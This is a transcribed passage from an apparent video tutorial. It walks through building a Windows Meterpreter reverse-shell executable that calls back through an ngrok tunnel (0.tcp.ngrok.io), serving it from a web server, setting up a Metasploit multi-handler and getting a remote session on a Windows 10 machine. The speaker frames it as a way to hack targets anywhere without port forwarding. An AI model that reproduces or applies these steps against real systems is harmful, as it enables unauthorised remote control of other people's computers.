local host to be 0.tcp.ngrok.io and local port to be the port that they gave us, so 14583 in my case, so 14583. Now let me just enlarge this a little bit, so zoom in. And after this, what you want to specify is the same as before, so you can use encoder if you want to, but I will not use in this case. So file exe, and we put that into shell.exe. This will create a simple Windows Meterpreter reverse shell for us, that will perform a connection to their website on this port. Now what that website will do then, it will forward that connection to our local host, which is 0.0.0.0 on port 5555. Now it means that actually it will forward it to the all interfaces, I believe, so you will be able to receive connection. There are also some of the things that you need to change in the MSF console as well, so I will show you that as well right now. Let me just, first of all, what I want to do is first of all become the root and then copy this shell.exe in var www.html so I can download it on my Windows 10 machine. So let's do that as well. Now while I do that, I will run here MSF console. So we let this open and then I will show you what you need to specify in order for this to actually work. So the simple thing you need to do is basically same as before, so you need to type here use exploit multi-handler. Once you do that, you basically just need to set the payload as the payload that you use. So in my case it is Windows Meterpreter reverse TCP. Now here, as we show options right here, you want to set the L host to be 0.0.0.0 and you want the L port to be 5555, since that is the L port that we specified in the Ngrok command. So set L port to be 5555. After you do all of that, you should be good to go. So I will just run my shell.exe over my Windows 10 machine. Let me just find it where I saved it. While I do that, I will just run this exploit jz, so it runs in the background. Right now I will run my shell.exe. It will ask me do I want to run it, since I actually installed it, downloaded it from the Apache tool. Whoops, let me just scroll this back down. I want to click more info, run anyway, and we can see that I got the Meterpreter session opened. So we were actually able to connect, or basically to hack a remote target that is actually across the globe. Now my Windows 10 machine isn't really across the globe, but this will work wherever that machine was, since we actually made that machine connect back to this link right here, which is a publicly available link. If I go right here on my Firefox, as we can see right here, sessions I1, if I get UID, you will see that this is my Windows 10 machine. So we can close this since we don't need to do anything anymore, and let me close this terminal as well. And if we use this link right here and copy it, you will see that there actually is a connection to that link. If I were to, for example, set up a listener and paste this right here, the listener would be able to, it would actually perform a Meterpreter shell opening, but the shell won't really work since there is no payload on this website. Now it says the connection was reset because we are not really listening for any connections at the moment, so we can't actually load the page. So that would be about it for this Ngrok tutorial. It is an alternative to port forwarding if you are, for example, not doing the over internet attacks over your own network with your own router. So you can use this in order to perform a simple port forward with the Ngrok website. So hope you enjoyed this video and hope I see you in the next one. Bye!